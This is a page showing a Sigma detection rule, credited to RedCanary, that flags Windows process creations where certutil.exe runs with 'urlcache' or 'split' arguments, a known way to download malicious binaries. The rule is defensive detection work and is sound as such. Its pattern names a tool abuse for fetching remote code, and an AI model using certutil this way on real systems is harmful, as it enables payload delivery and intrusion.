Certutil Downloading Malicious Binaries (RedCanary Threat Detection Report)
Detects attempts to bypass security controls using certutil.exe to download malicious code. Part of the RedCanary 2023 Threat Detection Report.
Sigma rule (View on GitHub)
1title: Certutil Downloading Malicious Binaries (RedCanary Threat Detection Report)
2id: 5da5a0a0-e610-4d72-9562-339eafdef216
3status: experimental
4description: |
5 Detects attempts to bypass security controls using certutil.exe to download malicious code.
6 Part of the RedCanary 2023 Threat Detection Report.
7references:
8 - https://redcanary.com/threat-detection-report/techniques/ingress-tool-transfer/
9author: RedCanary, Sigma formatting by Micah Babinski
10date: 2023/05/10
11tags:
12 - attack.command_and_control
13 - attack.t1105
14logsource:
15 category: process_creation
16 product: windows
17detection:
18 selection:
19 Image|endswith: '\certutil.exe'
20 CommandLine|contains:
21 - 'urlcache'
22 - 'split'
23 condition: selection
24falsepositives:
25 - Unknown
26level: low```
References
-
Ingress Tool Transfer is a technique adversaries leverage to bring their own external tools into a compromised network.
Read More
Related rules
- BITSAdmin Downloading Malicious Binaries (RedCanary Threat Detection Report)
- Possible Raspberry Robin DLL Download Using msiexec (RedCanary Threat Detection Report)
- Suspicious Registry Key Added: LanmanServer Parameters
- Suspicious Registry Key Set (MaxMpxCt)
- Suspicious Registry Modification of MaxMpxCt Parameters